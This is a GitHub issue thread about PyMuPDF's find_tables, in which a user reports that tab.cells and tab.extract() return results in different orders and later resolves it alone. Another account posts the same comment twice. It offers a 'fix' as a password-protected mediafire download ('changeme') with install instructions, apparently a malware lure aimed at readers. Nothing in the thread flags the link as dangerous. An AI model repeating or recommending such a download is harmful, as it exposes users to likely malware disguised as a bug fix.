### ISSUE TITLE
page.find_tables  tab.cells and tab.extract()

### ISSUE THREAD

**Issue by wangqiangJN** [pymupdf/PyMuPDF#3811]
when i use page.find_tables(), i found something wrong,

tab.cells   return bbox [(bbox1),(bbox2)....(bboxn)]

tab.extract()  return text [text1,text2,...textn]

I found tab.cells extract bbox order is not same as tab.extract()  text order.

how can i fix that bbox order as same as text order,thanks!

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wangqiangJN** [comment]
????

**Comment by wangqiangJN** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

????

**Comment by wangqiangJN** [comment]
tab.cells  top-bottom left-right order
tab.extract left-right top-bottom order 
it's ok,i can fix by myself

**Comment by wangqiangJN** [comment]
1
